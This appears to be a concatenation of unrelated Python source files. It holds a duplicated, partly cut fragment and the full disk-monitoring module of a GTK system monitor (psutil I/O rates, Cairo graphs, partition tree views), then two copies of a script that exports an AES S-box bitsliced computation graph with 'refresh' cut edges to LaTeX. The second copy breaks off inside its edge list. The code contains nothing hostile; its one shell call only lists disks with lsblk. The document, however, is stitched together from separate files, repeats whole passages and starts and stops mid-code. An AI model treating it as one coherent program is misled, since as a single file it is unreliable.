active_percetage=int(diskDiff[2]/(10*timediskDiff))
if active_percetage>100: active_percetage=100
self.diskActiveString.append(f'{active_percetage}%')
# Setting the info labels , 1024*1024=1048576 for MiB coversion
self.diskWidgetList[i].diskactivelabelvalue.set_text(self.diskActiveString[i])
self.diskWidgetList[i].diskreadlabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[0]/(timediskDiff*1048576)))
self.diskWidgetList[i].diskwritelabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[1]/(timediskDiff*1048576)))
# updating the sample data holding array depending upon the direction 1: newer on right
if self.update_graph_direction:
self.diskActiveArray[i].pop(0)
self.diskActiveArray[i].append((diskDiff[2])/(10*timediskDiff))##
self.diskReadArray[i].pop(0)
self.diskReadArray[i].append(diskDiff[0]/(timediskDiff*1048576))
self.diskWriteArray[i].pop(0)
self.diskWriteArray[i].append(diskDiff[1]/(timediskDiff*1048576))
else:
self.diskActiveArray[i].pop()
self.diskActiveArray[i].insert(0,(diskDiff[2])/(10*timediskDiff))##
self.diskReadArray[i].pop()
self.diskReadArray[i].insert(0,diskDiff[0]/((timediskDiff)*1048576))
self.diskWriteArray[i].pop()
self.diskWriteArray[i].insert(0,diskDiff[1]/((timediskDiff)*1048576))
# passing data to the disk tab widget class
self.diskWidgetList[i].givedata(self,i)
except Exception as e:
print(f'error in disk update: {e}')
# assigning the previous state/time to the current one
self.diskstate1=self.diskstate2
self.diskt1=self.diskt2
| #!/usr/bin/env python3
# import gi
# gi.require_version("Gtk", "3.24")
from gi.repository import Gtk as g,Gdk
import psutil as ps
from time import time
from os import popen
# Importing neccessary files
try:
from gi_composites import GtkTemplate
except ImportError:
from sysmontask.gi_composites import GtkTemplate
if __name__=='sysmontask.disk':
from sysmontask.sysmontask import files_dir
from sysmontask.gproc import sorting_func,byte_to_human
else:
from sysmontask import files_dir
from gproc import sorting_func,byte_to_human
@GtkTemplate(ui=files_dir+'/disk.glade')
class diskTabWidget(g.ScrolledWindow):
"""
A disk tab widget(top level box with all childs fields) which is made by the gtk template.
"""
# Required else you would need to specify the full module
# name in mywidget.ui (__main__+MyWidget)
__gtype_name__ = 'diskTabWidget'
# Declaring/Fetching/Assigning the required childs(name in the template should be the same as used here)
disktextlabel= GtkTemplate.Child()
diskinfolabel = GtkTemplate.Child()
diskdrawarea1=GtkTemplate.Child()
diskdrawarea2=GtkTemplate.Child()
disktextlabel=GtkTemplate.Child()
diskactivelabelvalue=GtkTemplate.Child()
diskreadlabelvalue=GtkTemplate.Child()
diskwritelabelvalue=GtkTemplate.Child()
diskcurrenspeedlabelvalue=GtkTemplate.Child()
diskUsagesTreeView=GtkTemplate.Child()
disk_read_color_descriptor= GtkTemplate.Child()
disk_write_color_descriptor= GtkTemplate.Child()
# Alternative way to specify multiple widgets
#label1, entry = GtkTemplate.Child.widgets(2)
def __init__(self):
"""Constructing the Disk Widget."""
super(g.ScrolledWindow, self).__init__()
# This must occur *after* you initialize your base
self.init_template()
# For the scaling of maximum value on the graph
self.diskmxfactor=1
self.secondself=None # main class
def givedata(self,secondself,index):
"""
Method to pass the data to the class object from outside. And assign them to the local class variables.
Parameters
----------
secondself : the main class reference(the main self) which will be calling this function.
index : index of the disk from several disks
"""
self.diskactiveArray=secondself.diskActiveArray[index]
self.diskreadArray=secondself.diskReadArray[index]
self.diskwriteArray=secondself.diskWriteArray[index]
self.secondself=secondself
@GtkTemplate.Callback
def on_diskDrawArea1_draw(self,dr,cr):
"""
Function Binding(for draw signal) for Disk Utilisation draw area.
This function draw the Disk's Utilisation curves upons called by the queue of request in the updator
function.
Parameters
----------
dr : the widget on which to draw the graph
cr : the cairo surface object
"""
cr.set_line_width(2)
# Color Pofile setup
color=self.secondself.color_profile['disk'][0]
rectangle_color=self.secondself.color_profile['disk'][1]
# Get the allocated width and height
w=self.diskdrawarea1.get_allocated_width()
h=self.diskdrawarea1.get_allocated_height()
# Vertical step size
scalingfactor=h/100.0
#creating outer rectangle
# cr.set_source_rgba(.109,.670,.0588,1)
cr.set_source_rgba(*rectangle_color,1)
cr.set_line_width(3)
cr.rectangle(0,0,w,h)
cr.stroke()
# creating grid lines
verticalGap=int(h/10)
horzontalGap=int(w/10)
for i in range(1,10):
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(0.5)
cr.move_to(0,i*verticalGap)
cr.line_to(w,i*verticalGap)
cr.move_to(i*horzontalGap,0)
cr.line_to(i*horzontalGap,h)
cr.stroke()
cr.stroke()
# Horizontal step size
stepsize=w/99.0
# Drawing the outer lines for the curve
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(100-self.diskactiveArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve
# cr.set_source_rgba(.431,1,.04,0.25) #for changing the fill color
cr.set_source_rgba(*color,0.25)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(100-self.diskactiveArray[0])+2)
cr.fill()
cr.stroke()
return False
@GtkTemplate.Callback
def on_diskDrawArea2_draw(self,dr,cr):
"""
Function Binding(for draw signal) for disk speed draw area.
This function draw the Disk's Read and Write speed curves upon called by the queue of request generated in the
main updator function.
Parameters
----------
dr : the widget on which to draw the graph
cr : the cairo surface object
"""
cr.set_line_width(2)
# Color Pofile setup
color=self.secondself.color_profile['disk'][0]
rectangle_color=self.secondself.color_profile['disk'][1]
self.disk_read_color_descriptor.set_markup(f'<span size="20000" foreground="{"#%02x%02x%02x" % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">|</span>')
self.disk_write_color_descriptor.set_markup(f'<span size="20000" foreground="{"#%02x%02x%02x" % (int(color[0]*255), int(color[1]*255), int(color[2]*255))}">¦</span>')
# Get the allocated widht and height
w=self.diskdrawarea2.get_allocated_width()
h=self.diskdrawarea2.get_allocated_height()
# Speed step in MB/s is the step in which the maximum speed(vertical scale) will adjust for dynamic speeds, i.e, in multiples
# of this step.
speedstep=50
# The maximum read or write speeds in the buffer
maximumcurrentspeed=max(max(self.diskreadArray),max(self.diskwriteArray))
# The current maximum scale speed
currentscalespeed=self.diskmxfactor*speedstep
# vertical scale adjustment calculation, i.e, new maximum scale speed
if(currentscalespeed<maximumcurrentspeed):
while(currentscalespeed<maximumcurrentspeed):
self.diskmxfactor+=1
currentscalespeed=self.diskmxfactor*speedstep
else:
while(currentscalespeed>maximumcurrentspeed+speedstep and self.diskmxfactor>1):
self.diskmxfactor-=1
currentscalespeed=self.diskmxfactor*speedstep
# Setting new maximum scale label
self.diskcurrenspeedlabelvalue.set_text(str(currentscalespeed)+'MB/s')
# vertical scaling factor(step)
scalingfactor=h/currentscalespeed
#creating outer rectangle
# cr.set_source_rgba(.109,.670,.0588,1)
cr.set_source_rgba(*rectangle_color,1)
cr.set_line_width(3)
cr.rectangle(0,0,w,h)
cr.stroke()
# creating grid lines
verticalGap=int(h/10)
horzontalGap=int(w/10)
for i in range(1,10):
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the grid line color
cr.set_source_rgba(*color,1)
cr.set_line_width(0.5)
cr.move_to(0,i*verticalGap)
cr.line_to(w,i*verticalGap)
cr.move_to(i*horzontalGap,0)
cr.line_to(i*horzontalGap,h)
cr.stroke()
cr.stroke()
# Horzontal step size
stepsize=w/99.0
## Read Speed ##
# Drawing the curve line
# cr.set_source_rgba(.109,.670,.0588,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[0])+2)
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskreadArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve with solid color, the curve(shape) should be a closed then only it can be filled
# cr.set_source_rgba(.431,1,.04,0.25) #for changing the fill color
cr.set_source_rgba(*color,0.2)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskreadArray[i])+2)
cr.fill()
cr.stroke()
## Write Speed ##
# Drawing the outer lines for the curve
# cr.set_source_rgba(.207,.941,.682,1) #for changing the outer line color
cr.set_source_rgba(*color,1)
cr.set_line_width(1.5)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
# Dash line configuration
cr.set_dash([3.0,3.0])
for i in range(0,99):
cr.line_to((i+1)*stepsize,scalingfactor*(currentscalespeed-self.diskwriteArray[i+1])+2)
cr.stroke_preserve()
# Filling the curve
# cr.set_source_rgba(.207,.941,.682,0.3) #for changing the fill color
cr.set_source_rgba(*color,0.2)
cr.line_to(w,h)
cr.line_to(0,h)
cr.move_to(0,scalingfactor*(currentscalespeed-self.diskwriteArray[0])+2)
cr.fill()
cr.stroke()
return False
def diskinit(self):
"""
Initilization of the Disk Components.
"""
# Declaring the lists to hold the name and size of the disks.
self.disklist=[]
self.disksize=[]
# Getting the name and size of the disks using shell command,(excluding zrams)
try:
p=popen('lsblk -d | grep -e ^NAME -e disk')
partitions=p.readlines()
p.close()
for parts in partitions:
tempparts=parts.split()
if 'NAME' not in tempparts[0] and 'zram' not in tempparts[0]:
self.disklist.append(tempparts[0])
self.disksize.append(tempparts[3])
print(tempparts[0])
except Exception as e:
print(f"Failed to get Disks: {e}")
# Declaring the Lists and dictionary for data holding
self.diskWidgetList={}
self.diskstate1=[]
self.diskActiveArray=[]
self.diskReadArray=[]
self.diskWriteArray=[]
self.numOfDisks=len(self.disklist)
# For partition information
self.diskPartitions={}
self.diskListStores={}
self.diskListStoreItrs={}
partitions=ps.disk_partitions()
# for scanning each
for i in range(0,self.numOfDisks):
# Creating a disk tab widget
self.diskWidgetList[i]=diskTabWidget()
# Adding to the stack
self.performanceStack.add_titled(self.diskWidgetList[i],f'page{self.stack_counter}','Disk'+str(i))
# For lookup devices and its assigned page number
self.device_stack_page_lookup[self.disklist[i]]=self.stack_counter
# Incrementing the stack counter to be used for side pane
self.stack_counter+=1
# Setting the labels for a disk at index i
self.diskWidgetList[i].disktextlabel.set_text(self.disklist[i])
self.diskWidgetList[i].diskinfolabel.set_text(self.disksize[i])
# Getting th I/O of disk
disktemp=ps.disk_io_counters(perdisk=True)
# Time for the previous data
self.diskt1=time()
# Storing the state1 of the different disks
for drives in disktemp:
if drives==self.disklist[i]:
self.diskstate1.append(disktemp[drives])
# partition info
self.diskPartitions[i]=[]
for part in partitions:
if self.disklist[i] in part[0]:
self.diskPartitions[i]+=[part]
# ListStore for treeview of disk storage
self.diskListStores[i]=g.ListStore(str,str,str,str,str,int,bool)
self.diskListStoreItrs[i]=[] # list of iterators for each row for a disk
# Storing the values in the list stores
for part in self.diskPartitions[i]:
temp=ps.disk_usage(part[1])
itr=self.diskListStores[i].append([part[0],part[1],part[2],byte_to_human(temp[0],persec=False),byte_to_human(temp[1],persec=False),temp[3],False])
self.diskListStoreItrs[i].append(itr)
# setting the model(liststore) for the treeview
self.diskWidgetList[i].diskUsagesTreeView.set_model(self.diskListStores[i])
# Iterating for making each column in the disk treeview
for k,col in enumerate(['Device','MountPoint','Type','Total','Used']):
# Text renderer
renderer=g.CellRendererText()
# Creating a column and assigning additional properties based on type
if col=='Used':
column=g.TreeViewColumn(col)
progRenderer=g.CellRendererProgress()
# progRenderer.props.text='50%'
# progRenderer.props.fraction=0.5
column.pack_start(renderer,False)
column.add_attribute(renderer,"text",4)
column.pack_start(progRenderer,False)
column.add_attribute(progRenderer,"value",5)
# column=g.TreeViewColumn(col,progRenderer,value=5,inverted=6)
else:
column=g.TreeViewColumn(col,renderer,text=k)
# Making each column sortable, resizable, and reorderable
column.set_sort_column_id(k)
column.set_resizable(True)
column.set_reorderable(True)
# column.set_expand(True)
column.set_alignment(0)
column.set_sort_indicator(True)
# Appending the column to the disk treestore
self.diskWidgetList[i].diskUsagesTreeView.append_column(column)
# self.processTreeStore.set_sort_func(i,sorting_func,None)
# Setting the custom sorting fucntion for the column 3(used column)
self.diskListStores[i].set_sort_func(3,sorting_func,3)
# data holding arrays
self.diskActiveArray.append([0]*100)
self.diskReadArray.append([0]*100)
self.diskWriteArray.append([0]*100)
# Providing the data to the disktab widget class
self.diskWidgetList[i].givedata(self,i)
def diskTabUpdate(self):
"""
Function to periodically update DISKs statistics.
"""
# getting the disk I/O and the current time
disktemp :dict(read_count,write_count,read_bytes,write_bytes,read_time,write_time,mrc,wrc,busy_time)=ps.disk_io_counters(perdisk=True)
self.diskt2=time()##
# Time elapsed from the previous update
timediskDiff=self.diskt2-self.diskt1
# Array for current state
self.diskstate2=[]
# Updating the disk storage tree view(partitions)
for i in range(0,self.numOfDisks):
try:
# New disk I/O state
self.diskstate2.append(disktemp[self.disklist[i]])
for j,part in enumerate(self.diskPartitions[i]):
temp=ps.disk_usage(part[1])
self.diskListStores[i].set(self.diskListStoreItrs[i][j],3,byte_to_human(temp[0],persec=False),4,byte_to_human(temp[1],persec=False),5,temp[3])
except Exception as e:
print(f"error in diskliststore: {e}")
# list to store the difference between the previous and the current disk state and to hold the disk active(utilisation)
self.diskActiveString=[]
for i in range(0,self.numOfDisks):
try:
# Calclulating the difference between current and previous disk state
diskDiff :list =[self.diskstate2[i].read_bytes-self.diskstate1[i].read_bytes\
,self.diskstate2[i].write_bytes-self.diskstate1[i].write_bytes\
,self.diskstate2[i].busy_time-self.diskstate1[i].busy_time]
# Disk active(utilisation) percentage
active_percetage=int(diskDiff[2]/(10*timediskDiff))
if active_percetage>100: active_percetage=100
self.diskActiveString.append(f'{active_percetage}%')
# Setting the info labels , 1024*1024=1048576 for MiB coversion
self.diskWidgetList[i].diskactivelabelvalue.set_text(self.diskActiveString[i])
self.diskWidgetList[i].diskreadlabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[0]/(timediskDiff*1048576)))
self.diskWidgetList[i].diskwritelabelvalue.set_text("{:.1f} MiB/s".format(diskDiff[1]/(timediskDiff*1048576)))
# updating the sample data holding array depending upon the direction 1: newer on right
if self.update_graph_direction:
self.diskActiveArray[i].pop(0)
self.diskActiveArray[i].append((diskDiff[2])/(10*timediskDiff))##
self.diskReadArray[i].pop(0)
self.diskReadArray[i].append(diskDiff[0]/(timediskDiff*1048576))
self.diskWriteArray[i].pop(0)
self.diskWriteArray[i].append(diskDiff[1]/(timediskDiff*1048576))
else:
self.diskActiveArray[i].pop()
self.diskActiveArray[i].insert(0,(diskDiff[2])/(10*timediskDiff))##
self.diskReadArray[i].pop()
self.diskReadArray[i].insert(0,diskDiff[0]/((timediskDiff)*1048576))
self.diskWriteArray[i].pop()
self.diskWriteArray[i].insert(0,diskDiff[1]/((timediskDiff)*1048576))
# passing data to the disk tab widget class
self.diskWidgetList[i].givedata(self,i)
except Exception as e:
print(f'error in disk update: {e}')
# assigning the previous state/time to the current one
self.diskstate1=self.diskstate2
self.diskt1=self.diskt2
|
#! /usr/bin/python3
# Copyright 2018 Gaëtan Cassiers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Export AES S-Box computation graph with cut edges to a LaTeX representation.
"""
import re
import networkx as nx
import parse
import graph_tools
from utils import draw_graph
s = open('repr_aes_bitslice/non_lin.txt').read()
s_out = open('repr_aes_bitslice/lin_out.txt').read()
g_out = parse.parse_string_graph(s_out)
out_nodes = set(g_out.nodes)
g = parse.parse(s, tag_output_fn=lambda g, n: n in out_nodes)
split_c_d = graph_tools.add_split_nodes(g)
split_c = list(split_c_d.values())
cut_edges = [
('y11s0', 'z6', 0), ('t40s2', 'z13', 0), ('t23s1', 't34', 0), ('y1s0', 't8', 0), ('t41s2', 'z17', 0), ('y5', 'y5s1', 0),
('y2', 'y2s1', 0), ('t24s3', 't27', 0), ('t16s0', 't18', 0), ('t29s4', 't39', 0), ('y17s0', 'z7', 0), ('t7s0', 't11', 0),
('t29s0', 'z5', 0), ('t44s0', 'z0', 0), ('z8', 'o8', 0), ('y4', 'y4s1', 0), ('t33s2', 't44', 0), ('y12', 'y12s1', 0),
('y15', 'y15s1', 0), ('t29', 't29s4', 0), ('t33s3', 't35', 0), ('t29s1', 't43', 0), ('t33s0', 't34', 0), ('y4s0', 'z11', 0),
('t25s1', 't40', 0), ('t41s1', 'z17', 0), ('t29s0', 't42', 0), ('t33s5', 'z11', 0), ('z9', 'o9', 0), ('y12s0', 'z9', 0),
('y3s0', 't3', 0), ('y10s0', 'z8', 0), ('t41s2', 't45', 0), ('t37s3', 't44', 0), ('y17', 'y17s1', 0), ('t24s2', 't33', 0),
('t33s1', 't34', 0), ('t37s0', 't41', 0), ('t22', 't22s2', 0), ('z12', 'o12', 0), ('t33s5', 't42', 0), ('y3', 'y3s1', 0),
('t37s2', 't44', 0), ('t42s2', 't45', 0), ('y10s0', 't15', 0), ('t33s4', 't35', 0), ('t29s0', 'z14', 0), ('y4s0', 't5', 0),
('t40s1', 't41', 0), ('t33s4', 't44', 0), ('t33s5', 'z2', 0), ('y7s0', 'z5', 0), ('t33s2', 'z2', 0), ('t40s2', 'z4', 0),
('y8s0', 't15', 0), ('t29s1', 't42', 0), ('y17s0', 't13', 0), ('t29s3', 't43', 0), ('t45s0', 'z7', 0), ('t42s1', 'z6', 0),
('y9s0', 't12', 0), ('t26s0', 't27', 0), ('t33s1', 't44', 0), ('t2s0', 't6', 0), ('t40s0', 'z4', 0), ('t23s0', 't26', 0),
('y3s0', 'z10', 0), ('t37s0', 'z1', 0), ('t41s0', 't45', 0), ('t14s0', 't17', 0), ('t33s3', 't44', 0), ('t37s2', 'z10', 0),
('t24s2', 't27', 0), ('t33s3', 't42', 0), ('y13s0', 'z12', 0), ('y12s0', 't2', 0), ('y7s0', 't10', 0), ('y13s0', 't7', 0),
('t33s2', 't42', 0), ('z6', 'o6', 0), ('y2s0', 't10', 0), ('t14s0', 't19', 0), ('z16', 'o16', 0), ('t22s1', 't29', 0),
('t33s0', 'z11', 0), ('z3', 'o3', 0), ('t41s2', 'z8', 0), ('t23s0', 't30', 0), ('t23s0', 't34', 0), ('t33s3', 'z2', 0),
('t29s2', 't42', 0), ('t27s1', 't38', 0), ('t42s1', 'z15', 0), ('t29s2', 't43', 0), ('t40', 't40s3', 0), ('t42s0', 't45', 0),
('t36', 't36s1', 0), ('t29s1', 'z5', 0), ('y7', 'y7s1', 0), ('y5s0', 'z13', 0), ('t27s1', 't35', 0), ('t27s0', 't28', 0),
('t40s1', 't43', 0), ('t24s0', 't36', 0), ('z7', 'o7', 0), ('t40s2', 't41', 0), ('y1', 'y1s1', 0), ('t43s1', 'z12', 0),
('t29s2', 'z5', 0), ('t27s2', 't35', 0), ('t33s3', 'z11', 0), ('t36s0', 't38', 0), ('y16s0', 'z3', 0), ('t40s2', 't43', 0),
('t33s5', 't44', 0), ('t29s3', 't42', 0), ('t33s4', 't42', 0), ('t29', 't29s2', 0), ('z4', 'o4', 0), ('y15s0', 't2', 0),
('y5s0', 't8', 0), ('x7', 'x7s1', 0), ('t37', 't37s3', 0), ('t24s3', 't30', 0), ('t33s2', 't35', 0), ('t37s2', 'z1', 0),
('t33s4', 'z11', 0), ('t33s1', 'z2', 0), ('t33s1', 't35', 0), ('x7s0', 'z2', 0), ('t42', 't42s0', 0), ('t12s0', 't14' , 0),
('t12s1', 't16', 0), ('t40s1', 'z4', 0), ('t42s2', 'z6', 0), ('t44', 't44s1', 0), ('t37s1', 'z1', 0), ('y16s0', 't7', 0),
('t25s0', 't28', 0), ('t33s2', 'z11', 0), ('t29s3', 'z14', 0), ('t44s1', 'z9', 0), ('t33s4', 'z2', 0), ('y8', 'y8s1', 0),
('t24s1', 't36', 0), ('t29s0', 't43', 0), ('t24', 't24s1', 0), ('y14s0', 'z16', 0), ('t43s0', 'z3', 0), ('t27s1', 't28', 0),
('y14s0', 't13', 0), ('y2s0', 'z14', 0), ('t40s0', 'z13', 0), ('t24s3', 't33', 0), ('y9s0', 'z15', 0), ('t23s1', 't30', 0),
('t41s0', 'z8', 0), ('t33s5', 't35', 0), ('y9', 'y9s1', 0), ('t29s3', 'z5', 0), ('t24s0', 't33', 0), ('t22s0', 't31', 0),
('t40s0', 't41', 0), ('y1s0', 'z4', 0), ('t26', 't26s1', 0), ('y15s0', 'z0', 0), ('t7s0', 't9', 0), ('x7s0', 't5', 0),
('t29s3', 't39', 0), ('t42s2', 'z15', 0), ('y16', 'y16s1', 0), ('t37s2', 't41', 0), ('t24s3', 't36', 0), ('t37s0', 'z10', 0),
('t33s3', 't34', 0), ('y14', 'y14s1', 0), ('y13', 'y13s1', 0), ('t33s4', 't34', 0), ('t29s1', 'z14', 0), ('t24s2', 't30', 0),
('y8s0', 'z17', 0), ('t37s1', 't41', 0), ('y6s0', 'z1', 0), ('t22s2', 't29', 0), ('t24s0', 't30', 0), ('y11', 'y11s1', 0),
('y10', 'y10s1', 0), ('t26s0', 't31', 0), ('t22s1', 't25', 0), ('t2s0', 't4', 0), ('t21', 't21s1', 0), ('t37s3', 'z10', 0),
('t33', 't33s0', 0), ('t24s0', 't27', 0), ('t33s2', 't34', 0), ('t27s2', 't38', 0), ('t21s0', 't26', 0), ('t40s1', 'z13', 0),
('y11s0', 't12', 0), ('t29s0', 't39', 0), ('t37s1', 't44', 0), ('t40s0', 't43', 0), ('t16s1', 't20', 0), ('t33s1', 't42', 0),
('t29s1', 't39', 0), ('y6', 'y6s1', 0), ('z10', 'o10', 0), ('t22s1', 't31', 0), ('t32', 't33', 0), ('t29s4', 'z14', 0),
('t22s0', 't25', 0), ('t23s1', 't26', 0), ('t21s0', 't25', 0), ('z17', 'o17', 0), ('t36s0', 't37', 0), ('t45s0', 'z16', 0),
('y6s0', 't3', 0)]
nok = [x for x in cut_edges if ' ' in x[0]+x[1]]
assert not nok, nok
print(len(cut_edges))
def rename_split(g, cut, split_c_d):
rename = dict()
for n, sg in split_c_d.items():
sg = [s for s in sg if s in g.nodes]
rename.update((s, f'{n}s{i}') for i, s in enumerate(sg))
return rename
def export_graph(g, cut, split_c_d):
cut = {(x, y) for x, y, *_ in cut}
rename = rename_split(g, cut, split_c_d)
def mn(n):
return rename.get(n, n)
def test_refresh(src, dest):
return f"\\refresh({format_var(mn(src))})" if (src, dest) in cut else format_var(mn(src))
for n in nx.topological_sort(g):
pred = list(g.predecessors(n))
if len(pred) == 0:
assert 'op' not in g.nodes[n], f"{n}, {g.nodes[n]["op"]}"
elif len(pred) == 1:
assert 'op' not in g.nodes[n], f"{n}, {g.nodes[n]["op"]}"
yield format_var(mn(n)) + "=" + test_refresh(pred[0], n)
elif len(pred) == 2:
op = g.nodes[n]['op']
o1 = test_refresh(pred[0], n)
o2 = test_refresh(pred[1], n)
op = op.replace('*', r'\cdot')
yield format_var(mn(n)) + " = " + o1 + f' {op} ' + o2
else:
raise ValueError(f"{n}, {pred}")
def format_var(l):
re_var = r'([a-z])([0-9]+)([a-z]?)([0-9]*)'
res = re.match(re_var, l)
assert res, l
n0, n1, n2, n3 = res.groups()
sp_comp = ',' + n3 if n2 else ''
#sp_comp = ',' + n2 + '_{' + n3 + '}' if n2 else ''
return n0 + '_{' + n1 + sp_comp + '}'
def format_assign(l):
if 'not' in l:
re_var_simple = r'[a-z][0-9]+'
res = re.match(f'({re_var_simple})=not\\(({re_var_simple})(\\*|\\+)({re_var_simple})\\)', l)
assert res, l
dest, src1, op, src2 = res.groups()
op = op.replace('*', r'\cdot')
res = format_var(dest) + ' = \\lognot(' + format_var(src1) + f' {op} ' + format_var(src2) + ')'
else:
dest, op, (src1, src2) = parse.parse_assignment(l)
op = op.replace('*', r'\cdot')
res = format_var(dest) + ' = ' + format_var(src1) + f' {op} ' + format_var(src2)
return f'${res}$ \\\\'
def sort_assign(l):
def k(s):
"$X_{DD}..."
s = s[1:]
return (s[0], int(''.join(filter(str.isdigit, s[3:5]))), s[5:].replace(',', 'z').replace('}', 'a'))
return list(sorted(l, key=k))
g4, simplified_cut_edges = graph_tools.without_unncessary_splits(g, cut_edges, split_c_d)
print(len(simplified_cut_edges))
exp = list(export_graph(g4, simplified_cut_edges, split_c_d))
exp = sort_assign(f'${x}$ \\\\' for x in exp)
exp_old = exp
exp = (
[x for x in exp if x.startswith('$x')] +
[x for x in exp if x.startswith('$y')] +
[x for x in exp if x.startswith('$t')] +
[x for x in exp if x.startswith('$z')] +
[x for x in exp if x.startswith('$o')]
)
s_in = open('repr_aes_bitslice/lin_in.txt').read()
s_out = open('repr_aes_bitslice/lin_out_not.txt').read()
s_out = s_out.replace('z', 'o')
exp_out = sort_assign(map(format_assign, s_out.splitlines()))
exp_out = (
[x for x in exp_out if x.startswith('$t')] +
[x for x in exp_out if x.startswith('$s')]
)
s = (
'\\begin{multicols}{5}\n' +
'[Top linear layer\n]\n' +
r'\noindent' +
'\n'.join(sort_assign(map(format_assign, s_in.splitlines()))) + '\n' +
'\\end{multicols}\n\n' +
'\\begin{multicols}{5}\n' +
'[Middle non-linear layer\n]\n' +
r'\noindent' +
'\n'.join(exp) + '\n' +
'\\end{multicols}\n\n' +
'\\begin{multicols}{5}\n' +
'[Bottom linear layer\n]\n' +
r'\noindent' +
'\n'.join(exp_out) + '\n' +
'\\end{multicols}\n'
)
print(s)
| #! /usr/bin/python3
# Copyright 2018 Gaëtan Cassiers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Export AES S-Box computation graph with cut edges to a LaTeX representation.
"""
import re
import networkx as nx
import parse
import graph_tools
from utils import draw_graph
s = open('repr_aes_bitslice/non_lin.txt').read()
s_out = open('repr_aes_bitslice/lin_out.txt').read()
g_out = parse.parse_string_graph(s_out)
out_nodes = set(g_out.nodes)
g = parse.parse(s, tag_output_fn=lambda g, n: n in out_nodes)
split_c_d = graph_tools.add_split_nodes(g)
split_c = list(split_c_d.values())
cut_edges = [
('y11s0', 'z6', 0), ('t40s2', 'z13', 0), ('t23s1', 't34', 0), ('y1s0', 't8', 0), ('t41s2', 'z17', 0), ('y5', 'y5s1', 0),
('y2', 'y2s1', 0), ('t24s3', 't27', 0), ('t16s0', 't18', 0), ('t29s4', 't39', 0), ('y17s0', 'z7', 0), ('t7s0', 't11', 0),
('t29s0', 'z5', 0), ('t44s0', 'z0', 0), ('z8', 'o8', 0), ('y4', 'y4s1', 0), ('t33s2', 't44', 0), ('y12', 'y12s1', 0),
('y15', 'y15s1', 0), ('t29', 't29s4', 0), ('t33s3', 't35', 0), ('t29s1', 't43', 0), ('t33s0', 't34', 0), ('y4s0', 'z11', 0),
('t25s1', 't40', 0), ('t41s1', 'z17', 0), ('t29s0', 't42', 0), ('t33s5', 'z11', 0), ('z9', 'o9', 0), ('y12s0', 'z9', 0),
('y3s0', 't3', 0), ('y10s0', 'z8', 0), ('t41s2', 't45', 0), ('t37s3', 't44', 0), ('y17', 'y17s1', 0), ('t24s2', 't33', 0),
('t33s1', 't34', 0), ('t37s0', 't41', 0), ('t22', 't22s2', 0), ('z12', 'o12', 0), ('t33s5', 't42', 0), ('y3', 'y3s1', 0),
('t37s2', 't44', 0), ('t42s2', 't45', 0), ('y10s0', 't15', 0), ('t33s4', 't35', 0), ('t29s0', 'z14', 0), ('y4s0', 't5', 0),
('t40s1', 't41', 0), ('t33s4', 't44', 0), ('t33s5', 'z2', 0), ('y7s0', 'z5', 0), ('t33s2', 'z2', 0), ('t40s2', 'z4', 0),
('y8s0', 't15', 0), ('t29s1', 't42', 0), ('y17s0', 't13', 0), ('t29s3', 't43', 0), ('t45s0', 'z7', 0), ('t42s1', 'z6', 0),
('y9s0', 't12', 0), ('t26s0', 't27', 0), ('t33s1', 't44', 0), ('t2s0', 't6', 0), ('t40s0', 'z4', 0), ('t23s0', 't26', 0),
('y3s0', 'z10', 0), ('t37s0', 'z1', 0), ('t41s0', 't45', 0), ('t14s0', 't17', 0), ('t33s3', 't44', 0), ('t37s2', 'z10', 0),
('t24s2', 't27', 0), ('t33s3', 't42', 0), ('y13s0', 'z12', 0), ('y12s0', 't2', 0), ('y7s0', 't10', 0), ('y13s0', 't7', 0),
('t33s2', 't42', 0), ('z6', 'o6', 0), ('y2s0', 't10', 0), ('t14s0', 't19', 0), ('z16', 'o16', 0), ('t22s1', 't29', 0),
('t33s0', 'z11', 0), ('z3', 'o3', 0), ('t41s2', 'z8', 0), ('t23s0', 't30', 0), ('t23s0', 't34', 0), ('t33s3', 'z2', 0),
('t29s2', 't42', 0), ('t27s1', 't38', 0), ('t42s1', 'z15', 0), ('t29s2', 't43', 0), ('t40', 't40s3', 0), ('t42s0', 't45', 0),
('t36', 't36s1', 0), ('t29s1', 'z5', 0), ('y7', 'y7s1', 0), ('y5s0', 'z13', 0), ('t27s1', 't35', 0), ('t27s0', 't28', 0),
('t40s1', 't43', 0), ('t24s0', 't36', 0), ('z7', 'o7', 0), ('t40s2', 't41', 0), ('y1', 'y1s1', 0), ('t43s1', 'z12', 0),
